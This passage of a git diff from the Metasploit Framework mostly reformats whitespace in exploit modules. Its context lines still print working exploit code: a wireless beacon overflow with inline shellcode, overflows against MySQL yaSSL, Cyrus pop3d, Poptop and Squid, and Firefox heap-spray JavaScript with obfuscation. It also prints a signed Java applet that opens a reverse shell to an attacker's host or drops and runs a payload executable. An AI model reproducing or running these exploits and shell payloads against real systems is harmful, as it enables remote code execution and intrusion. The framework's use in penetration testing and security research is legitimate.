jmpesp = target['JMPESP'] # jmp esp in vdso - scan_iterate_ra=target['scan_iterate_ra'] # address just after the call - # in ieee80211_scan_iterate in wlan.ko - if scan_iterate_ra - howtoreturn="RETURN_PROPERLY" # Return to the parent of giwscan_cb parent - else - howtoreturn="RETURN_BADLY" # Return to userland with IRET - end - bssiwlist = 0x0804ddd0 + def create_beacon - stacksize="STACK_8K" - getregs="CALCULATE" - #getregs="IWANTTOSCANMANUALLY" - reg_cs="0x73" - reg_ss="0x7b" + ssid = datastore['SSID'].to_s + bssid = Rex::Text.rand_text(6) + channel = datastore['CHANNEL'].to_i + len = datastore['LENGTH'].to_i + seq = [rand(255)].pack('n') + jmpesp = target['JMPESP'] # jmp esp in vdso + scan_iterate_ra=target['scan_iterate_ra'] # address just after the call + # in ieee80211_scan_iterate in wlan.ko -wiframe = Metasm::Shellcode.assemble Metasm::Ia32.new, <(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff) + #, 'monadresseip'=>(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff) -#puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',') + #puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',') -if (len == 24 and value.length != 198) - raise "Value is too big! #{value.length}" -end + if (len == 24 and value.length != 198) + raise "Value is too big! #{value.length}" + end - buf = "\xdd" + value.length.chr + value + buf = "\xdd" + value.length.chr + value - frame = + frame = "\x80" + # type/subtype "\x00" + # flags - "\x00\x00" + # duration + "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid - seq + # seq + seq + # seq Rex::Text.rand_text(8) + # timestamp value "\x64\x00" + # beacon interval "\x01\x00" + # capabilities - - # ssid IE - "\x00" + ssid.length.chr + ssid + - # supported rates IE - "\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" + + # ssid IE + "\x00" + ssid.length.chr + ssid + - # channel IE - "\x03" + "\x01" + channel.chr + + # supported rates IE + "\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" + - # invalid wpa IE buffer overflow - # wpa ie is an example, still valid for other IEs - buf + # channel IE + "\x03" + "\x01" + channel.chr + - return frame + # invalid wpa IE buffer overflow + # wpa ie is an example, still valid for other IEs + buf + + return frame end end diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index 301f506549..faa6d20cf0 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -80,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 25 2010')) - register_options([ Opt::RPORT(3306) ], self) + register_options([ Opt::RPORT(3306) ], self) end def exploit diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index d15a05eebb..b5acddf347 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MySQL yaSSL SSL Hello Message Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the yaSSL (1.7.5 and earlier) - implementation bundled with MySQL <= 6.0. By sending a specially crafted - Hello packet, an attacker may be able to execute arbitrary code. + implementation bundled with MySQL <= 6.0. By sending a specially crafted + Hello packet, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -43,16 +41,19 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c", }, 'Platform' => 'linux', - 'Targets' => + 'Targets' => [ - [ 'MySQL 5.0.45-Debian_1ubuntu3.1-log', { 'Ret' => 0x085967fb } ], + [ 'MySQL 5.0.45-Debian_1ubuntu3.1-log', { 'Ret' => 0x085967fb } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 4 2008')) - register_options([ Opt::RPORT(3306)], self.class) + register_options( + [ + Opt::RPORT(3306) + ], self.class) end - + def exploit connect diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index a237ec40a1..d714953138 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow', 'Description' => %q{ - This exploit takes advantage of a stack based overflow. Once the stack + This exploit takes advantage of a stack based overflow. Once the stack corruption has occured it is possible to overwrite a pointer which is - later used for a memcpy. This gives us a write anything anywhere condition + later used for a memcpy. This gives us a write anything anywhere condition similar to a format string vulnerability. NOTE: The popsubfolders option is a non-default setting. - I chose to overwrite the GOT with my shellcode and return to it. This + I chose to overwrite the GOT with my shellcode and return to it. This defeats the VA random patch and possibly other stack protection features. Tested on gentoo-sources Linux 2.6.16. Although Fedora CORE 5 ships with @@ -64,18 +68,18 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - + connect print_status "Banner: #{banner = sock.gets}" # NOTE: orig poc shellcode len: 84 - + # kcope: 352+84+86+4 (nops,sc,nops,ret) # K-sPecial: 84+(120*4) (sc,addrs) # bannedit: 265+8+250+29+16 shellcode = payload.encoded - + buf = "USER " buf << make_nops(265) # return address diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index f2f8689207..2e2ebf04a4 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,18 +18,18 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Brute def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Poptop Negative Read Overflow', 'Description' => %q{ - This is an exploit for the Poptop negative read overflow. This will - work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I - currently do not have a good way to detect Poptop versions. + This is an exploit for the Poptop negative read overflow. This will + work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I + currently do not have a good way to detect Poptop versions. - The server will by default only allow 4 concurrent manager processes - (what we run our code in), so you could have a max of 4 shells at once. + The server will by default only allow 4 concurrent manager processes + (what we run our code in), so you could have a max of 4 shells at once. - Using the current method of exploitation, our socket will be closed - before we have the ability to run code, preventing the use of Findsock. + Using the current method of exploitation, our socket will be closed + before we have the ability to run code, preventing the use of Findsock. }, 'Author' => 'spoonm', 'License' => MSF_LICENSE, @@ -57,10 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote 'SaveRegisters' => [ 'esp' ], 'Platform' => 'linux', 'Arch' => ARCH_X86, - 'Targets' => + 'Targets' => [ - ['Linux Bruteforce', - { 'Bruteforce' => + ['Linux Bruteforce', + { 'Bruteforce' => { 'Start' => { 'Ret' => 0xbffffa00 }, 'Stop' => { 'Ret' => 0xbffff000 }, @@ -112,22 +110,22 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - + def brute_exploit(addrs) connect print_status("Trying #{"%.8x" % addrs['Ret']}...") # Construct the evil length packet - packet = + packet = build_packet(1) + payload.encoded + ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4)) sock.put(packet) - + handler disconnect end - + end diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index 99764623d8..8457729e82 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -20,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Squid NTLM Authenticate Overflow', 'Description' => %q{ - This is an exploit for Squid's NTLM authenticate overflow + This is an exploit for Squid\'s NTLM authenticate overflow (libntlmssp.c). Due to improper bounds checking in ntlm_check_auth, it is possible to overflow the 'pass' variable on the stack with user controlled data of a user @@ -47,18 +47,18 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x83\xec\x7f", }, - 'Targets' => + 'Targets' => [ - [ 'Linux Bruteforce', - { - 'Platform' => 'linux', - 'Bruteforce' => + [ 'Linux Bruteforce', + { + 'Platform' => 'linux', + 'Bruteforce' => { 'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c }, 'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc }, 'Step' => 0 } - }, + }, ], ], 'DisclosureDate' => 'Jun 8 2004', @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end def trasnmit_negotiate(site) - negotiate = + negotiate = "NTLMSSP\x00" + # NTLMSSP identifier "\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE "\x07\x00\xb2\x07" + # flags @@ -102,14 +102,14 @@ class Metasploit3 < Msf::Exploit::Remote "Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" + "\r\n" sock.put(req) - + end def transmit_authenticate(site, addresses) - overflow = - rand_text_alphanumeric(0x20) + - [addresses['Ret']].pack('V') + - [addresses['Valid']].pack('V') + + overflow = + rand_text_alphanumeric(0x20) + + [addresses['Ret']].pack('V') + + [addresses['Valid']].pack('V') + "\xff\x00\x00\x00" shellcode = payload.encoded pass_len = [overflow.length + shellcode.length].pack('v') diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index e5d41c9607..6e01b21733 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -36,21 +34,21 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firefox 3.5 escape() Return Value Memory Corruption', 'Description' => %q{ - This module exploits a memory corruption vulnerability in the Mozilla - Firefox browser. This flaw occurs when a bug in the javascript interpreter - fails to preserve the return value of the escape() function and results in - uninitialized memory being used instead. This module has only been tested - on Windows, but should work on other platforms as well with the current - targets. - + This module exploits a memory corruption vulnerability in the Mozilla + Firefox browser. This flaw occurs when a bug in the javascript interpreter + fails to preserve the return value of the escape() function and results in + uninitialized memory being used instead. This module has only been tested + on Windows, but should work on other platforms as well with the current + targets. }, 'License' => MSF_LICENSE, - 'Author' => [ - 'Simon Berry-Byrne ', # Author / Publisher / Original exploit - 'hdm', # Metasploit conversion - ], + 'Author' => + [ + 'Simon Berry-Byrne ', # Author / Publisher / Original exploit + 'hdm', # Metasploit conversion + ], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2009-2477'], ['OSVDB', '55846'], @@ -64,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - [ 'Firefox 3.5.0 on Windows XP SP0-SP3', + [ 'Firefox 3.5.0 on Windows XP SP0-SP3', { 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -73,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Containers' => 800, } ], - [ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)', + [ 'Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, @@ -86,8 +84,9 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 14 2006' )) - end + + def on_request_uri(cli, request) # Re-generate the payload @@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html; charset=utf-8' }) handler(cli) end - + def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) @@ -105,18 +104,18 @@ class Metasploit3 < Msf::Exploit::Remote enc_ret = Rex::Text.to_unescape( Rex::Arch.endian(target.arch) == ENDIAN_LITTLE ? [target.ret].pack('V') : [target.ret].pack('N') ) - + var_data_str1 = Rex::Text.rand_text_alpha(3) var_data_str2 = Rex::Text.rand_text_alpha(4) js = %Q^ var xunescape = unescape; var shellcode = xunescape("#{enc_code}"); - + oneblock = xunescape("#{enc_ret}"); var fullblock = oneblock; -while (fullblock.length < #{target['BlockLen']}) +while (fullblock.length < #{target['BlockLen']}) { fullblock += fullblock; } @@ -125,7 +124,7 @@ var sprayContainer = new Array(); var sprayready = false; var sprayContainerIndex = 0; -function fill_function() +function fill_function() { if(! sprayready) { for (xi=0; xi<#{target['Containers']}/100; xi++, sprayContainerIndex++) @@ -142,7 +141,7 @@ function fill_function() } var searchArray = new Array(); - + function escapeData(data) { var xi; @@ -156,8 +155,8 @@ function escapeData(data) } return escData; } - -function DataTranslator() + +function DataTranslator() { searchArray = new Array(); searchArray[0] = new Array(); @@ -166,7 +165,7 @@ function DataTranslator() if (document.getElementsByTagName) { var xi=0; pTags = newElement.getElementsByTagName("p"); - if (pTags.length > 0) + if (pTags.length > 0) while (xi < pTags.length) { oTags = pTags[xi].getElementsByTagName("font"); @@ -178,37 +177,34 @@ function DataTranslator() } } } - + function GenerateHTML() { var xhtml = ""; for (xi=1;xi { - 'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function } - } -).to_s + # Obfuscate it up a bit + js = obfuscate_js(js, 'Symbols' => { + 'Variables' => %W{ DataTranslator GenerateHTML escapeData xunescape shellcode oneblock fullblock sprayContainer xi searchArray xc escData xhtml pTags oTags newElement sprayready sprayContainerIndex fill_function } + }).to_s -str1 = Rex::Text.rand_text_alpha(20) -str2 = Rex::Text.rand_text_alpha(24) -str3 = Rex::Text.rand_text_alpha(10) + " " + str1 = Rex::Text.rand_text_alpha(20) + str2 = Rex::Text.rand_text_alpha(24) + str3 = Rex::Text.rand_text_alpha(10) + " " - return %Q^

- +

diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 3e1069f80f..e7cb5feb03 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -25,16 +23,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Firefox location.QueryInterface() Code Execution', 'Description' => %q{ - This module exploits a code execution vulnerability in the Mozilla - Firefox browser. To reliably exploit this vulnerability, we need to fill - almost a gigabyte of memory with our nop sled and payload. This module has - been tested on OS X 10.3 with the stock Firefox 1.5.0 package. - + This module exploits a code execution vulnerability in the Mozilla + Firefox browser. To reliably exploit this vulnerability, we need to fill + almost a gigabyte of memory with our nop sled and payload. This module has + been tested on OS X 10.3 with the stock Firefox 1.5.0 package. }, 'License' => MSF_LICENSE, 'Author' => ['hdm'], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2006-0295'], ['OSVDB', '22893'], @@ -48,17 +45,17 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - [ 'Firefox 1.5.0.0 Mac OS X', + [ 'Firefox 1.5.0.0 Mac OS X', { 'Platform' => 'osx', - 'Arch' => ARCH_PPC + 'Arch' => ARCH_PPC } ], - [ 'Firefox 1.5.0.0 Linux', + [ 'Firefox 1.5.0.0 Linux', { 'Platform' => 'linux', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, } ], ], @@ -67,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) @@ -75,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) handler(cli) end - + def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb index d407609629..3223a9540e 100644 --- a/modules/exploits/multi/browser/java_signed_applet.rb +++ b/modules/exploits/multi/browser/java_signed_applet.rb @@ -19,17 +19,16 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Java def initialize( info = {} ) - super( update_info( info, 'Name' => 'Signed Applet Social Engineering Code Exec', 'Description' => %q{ - This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it - to a .jar file, then signs the .jar with a dynamically created certificate containing - values of your choosing. This is presented to the end user via a web page with an applet + This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it + to a .jar file, then signs the .jar with a dynamically created certificate containing + values of your choosing. This is presented to the end user via a web page with an applet tag, loading the signed applet. - The user's JVM pops a dialog asking if they trust the signed applet and displays the - values chosen. Once the user clicks 'accept', the applet executes with full user + The user's JVM pops a dialog asking if they trust the signed applet and displays the + values chosen. Once the user clicks 'accept', the applet executes with full user permissions. The java payload used in this exploit is derived from Stephen Fewer's and HDM's payload @@ -52,13 +51,13 @@ class Metasploit3 < Msf::Exploit::Remote [ # Generic java payload is mostly useless right now, as it kills as soon as the user browses # to another page. It should be rewritten to launch a new JVM in the background with a custom - # .class. - # - # Look up the path to bin/java, dump .class to java.io.tmpdir, then bin/java foo.class via + # .class. + # + # Look up the path to bin/java, dump .class to java.io.tmpdir, then bin/java foo.class via # /bin/sh or cmd.exe [ 'Generic (Java Payload)', { - # This is a bad hack to force only the generic/shell_bind_tcp + # This is a bad hack to force only the generic/shell_bind_tcp # and generic/shell_reverse_tcp payloads 'Platform' => ['win'], 'Payload' => { 'Space' => 0 }, @@ -90,24 +89,24 @@ class Metasploit3 < Msf::Exploit::Remote } ], ], - 'DefaultTarget' => 1 - )) - register_options( - [ - OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]), - OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]), - OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]), - - # Not implemented yet. - #OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]), - #OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]), - ], self.class) - register_advanced_options( - [ - OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ]), - OptString.new('Template', [ true, "The default executable template to use", File.join(Msf::Config.install_root, "data", "templates", "template.exe") ]), - OptString.new('InsertPayload', [ false, "Inject payload into template without affecting executable behavior", nil ]) - ], self.class) + 'DefaultTarget' => 1 + )) + register_options( + [ + OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]), + OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]), + OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]), + + # Not implemented yet. + #OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]), + #OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]), + ], self.class) + register_advanced_options( + [ + OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ]), + OptString.new('Template', [ true, "The default executable template to use", File.join(Msf::Config.install_root, "data", "templates", "template.exe") ]), + OptString.new('InsertPayload', [ false, "Inject payload into template without affecting executable behavior", nil ]) + ], self.class) end @@ -131,12 +130,12 @@ class Metasploit3 < Msf::Exploit::Remote appletsource = get_code save_to_file( appletsource['classnames'], appletsource['codefiles'], datastore['SaveToFile'] ) end - - super + + super end - + def get_code - + appletsource = %Q^ /* */ @@ -163,35 +162,35 @@ public class #{datastore['APPLETNAME']} extends Applet public void init() { try - { + { String data = getParameter( "data" ); String lhost = getParameter( "lhost" ); String lport = getParameter( "lport" ); - + if( data == null ) { data = ""; } - + //System.out.println("Applet executing. Creating payload class."); - + #{datastore['PAYLOADNAME']} site = new #{datastore['PAYLOADNAME']} (); //System.out.println("Payload class instantiated."); site.data = data; - + if( lhost != null && lport != null) { site.lhost = lhost; site.lport = Integer.parseInt(lport); System.out.println("lhost: " + lhost); System.out.println("lport: " + Integer.parseInt(lport)); } - + //System.out.println("data: " + data); site.run(); } catch( Exception e ) { System.out.println("Applet error: " + e); } } - + class #{datastore['PAYLOADNAME']} implements PrivilegedExceptionAction { // This will contain a hex string of the native payload to drop and execute. @@ -200,23 +199,23 @@ public class #{datastore['APPLETNAME']} extends Applet // reverse shell. public String lhost = null; public int lport = 4444; - + class StreamConnector extends Thread { InputStream is; OutputStream os; - + StreamConnector( InputStream is, OutputStream os ) { this.is = is; this.os = os; } - + public void run() { BufferedReader in = null; BufferedWriter out = null; - + try { in = new BufferedReader( new InputStreamReader( is ) ); @@ -230,7 +229,7 @@ public class #{datastore['APPLETNAME']} extends Applet } } catch( Exception e ) { System.out.println( "StreamConnector error: " + e); } - + try { if( in != null ) @@ -241,26 +240,26 @@ public class #{datastore['APPLETNAME']} extends Applet catch( Exception e ) { System.out.println( "StreamConnector error: " + e); } } } - + // http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java public byte[] StringToBytes( String s ) { byte[] data = new byte[s.length() / 2]; - + for( int i = 0 ; i < s.length() ; i += 2 ) data[i / 2] = (byte)( ( Character.digit( s.charAt( i ), 16 ) << 4 ) + Character.digit( s.charAt( i + 1 ), 16 ) ); - + return data; } - + public Object run() throws Exception { //System.out.println("Applet running..."); - + try { String os = System.getProperty( "os.name" ); - + // if we have no native payload to drop and execute we default to // either a TCP bind or reverse shell. //if( #{datastore['PAYLOADNAME']}.data.length() == 0 ) @@ -268,12 +267,12 @@ public class #{datastore['APPLETNAME']} extends Applet { //System.out.println("Applet thinks payload.data is empty."); Socket client_socket = null; - + String shell = "/bin/sh"; - + if( os.indexOf( "Windows" ) >= 0 ) shell = "cmd.exe"; - + //if( #{datastore['PAYLOADNAME']}.lhost == null ) if( this.lhost == null ) { @@ -286,15 +285,15 @@ public class #{datastore['APPLETNAME']} extends Applet //client_socket = new Socket( #{datastore['PAYLOADNAME']}.lhost, #{datastore['PAYLOADNAME']}.lport ); client_socket = new Socket( this.lhost, this.lport ); } - + if( client_socket != null ) { Process process = Runtime.getRuntime().exec( shell ); - + ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start(); ( new StreamConnector( process.getErrorStream(), client_socket.getOutputStream() ) ).start(); - + ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); } } @@ -304,33 +303,33 @@ public class #{datastore['APPLETNAME']} extends Applet String filename = Math.random() + ".exe"; String path = System.getProperty( "java.io.tmpdir" ) + File.separator + filename; //System.out.println(filename + " written."); - + Process p; FileOutputStream fos = new FileOutputStream( path ); - + //fos.write( StringToBytes( #{datastore['PAYLOADNAME']}.data ) ); fos.write( StringToBytes( this.data ) ); fos.close(); - + if( os.indexOf( "Windows" ) < 0 ) { p = Runtime.getRuntime().exec( "chmod 755 " + path ); p.waitFor(); } - + p = Runtime.getRuntime().exec( path ); - + p.waitFor(); - + new File( path ).delete(); } } catch( Exception e ) { System.out.println("Payload execution error: " + e); } - + return null; } - + public void #{datastore['PAYLOADNAME']}() { try @@ -373,7 +372,7 @@ public class #{datastore['APPLETNAME']} extends Applet print_status( "Failed to generate the payload." ) return end - + if target['Arch'] == ARCH_X86 if target['Platform'] == 'win' opts = { :template => datastore['Template'], :insert => datastore['InsertPayload'] } @@ -381,7 +380,7 @@ public class #{datastore['APPLETNAME']} extends Applet end data = Msf::Util::EXE.to_osx_x86_macho( framework, payload.encoded ) if target['Platform'] == 'osx' data = Msf::Util::EXE.to_linux_x86_elf( framework, payload.encoded ) if target['Platform'] == 'linux' - + elsif target['Arch'] == ARCH_PPC data = Msf::Util::EXE.to_osx_ppc_macho( framework, payload.encoded ) if target['Platform'] == 'osx' end @@ -400,12 +399,12 @@ public class #{datastore['APPLETNAME']} extends Applet print_status "Compiling applet classes..." compile( appletcode['classnames'], appletcode['codefiles'] ) - + print_status "Compile completed. Building jar file..." unsignedjar = "unsigned_#{datastore['APPLETNAME']}.jar" @signedjar = "#{datastore['APPLETNAME']}.jar" - + build_jar( unsignedjar, [ # Applet datastore['APPLETNAME'] + ".class", @@ -413,34 +412,34 @@ public class #{datastore['APPLETNAME']} extends Applet datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + ".class", # PayloadX StreamConnector for pure Java payload datastore['APPLETNAME'] + "$" + datastore['PAYLOADNAME'] + "$StreamConnector.class" ] ) - + print_status "Jar built. Signing..." - + sign_jar( datastore['CERTCN'], unsignedjar, @signedjar ) - + print_status "Jar signed. Ready to send." else print_status "Using static, signed jar. Ready to send." end - + # TODO: gzip data and parse in java send_response_html( cli, generate_html( data, host, port ), { 'Content-Type' => 'text/html' } ) return end - + # load the jar file if @use_static path = File.join( Msf::Config.install_root, "data", "exploits", "java_signed_applet.jar" ) elsif File.exists? File.join( datastore['JAVACACHE'], @signedjar ) path = File.join( datastore['JAVACACHE'], @signedjar ) end - + if path fd = File.open( path, "rb" ) @jar_data = fd.read(fd.stat.size) fd.close end - + print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." ) send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } ) @@ -462,5 +461,4 @@ public class #{datastore['APPLETNAME']} extends Applet return html end - end diff --git a/modules/exploits/multi/browser/mozilla_compareto.rb b/modules/exploits/multi/browser/mozilla_compareto.rb index 20136b40fd..c08110fa1b 100644 --- a/modules/exploits/multi/browser/mozilla_compareto.rb +++ b/modules/exploits/multi/browser/mozilla_compareto.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -38,15 +36,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution', 'Description' => %q{ - This module exploits a code execution vulnerability in the Mozilla - Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit - module is a direct port of Aviv Raff's HTML PoC. - + This module exploits a code execution vulnerability in the Mozilla + Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit + module is a direct port of Aviv Raff's HTML PoC. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'Aviv Raff '], 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2005-2265'], ['OSVDB', '17968'], @@ -62,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote [ # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on # WinXP-SP3 and Win2kAS-SP0 - [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows', + [ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86, @@ -76,22 +73,22 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, request) - + # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) - + # Handle the payload handler(cli) end - + def generate_html(payload) enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch)) - + 